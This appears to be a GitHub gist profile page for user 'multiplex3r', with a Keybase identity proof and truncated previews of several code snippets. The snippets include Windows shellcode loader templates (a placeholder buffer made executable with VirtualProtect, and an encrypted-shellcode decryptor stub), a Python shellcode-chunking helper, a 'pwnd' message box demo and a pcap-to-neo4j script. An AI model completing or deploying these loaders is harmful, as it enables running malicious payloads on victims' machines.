I hereby claim:
- I am multiplex3r on github.
- I am multiplex3r (https://keybase.io/multiplex3r) on keybase.
- I have a public key whose fingerprint is DFDF F47F 4C00 076C 2C82 A834 6716 6CA8 F415 CCB5
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#include <windows.h> | |
#include <winbase.h> | |
void main(){ | |
MessageBox(0,"You have been pwnd!","Pwnd!",1); | |
} |
#include <windows.h> | |
unsigned char buf[] = | |
"your" | |
"shellcode" | |
"here"; | |
void executePayload(){ | |
DWORD pewpewpew; | |
VirtualProtect(buf, sizeof(buf),PAGE_EXECUTE_READWRITE, &pewpewpew); |
#!/usr/bin/env python | |
import sys | |
def chunks(l, n): | |
for i in range(0, len(l), n): | |
yield l[i:i + n] | |
shellcode = "your" | |
shellcode += "shellcode" | |
shellcode += "here" |
#include <windows.h> | |
unsigned char buf[] = | |
"your" | |
"encrypted" | |
"shellcode" | |
"here"; | |
char* decryptPayload(){ |
#!/usr/bin/env python3 | |
from scapy.all import * | |
from py2neo import Graph, Node, Relationship | |
packets = rdpcap("<your_pcap_file>") | |
g = Graph(password="<your_neo4j_password>") | |
for packet in packets.sessions(): | |
pkt = packet.split() |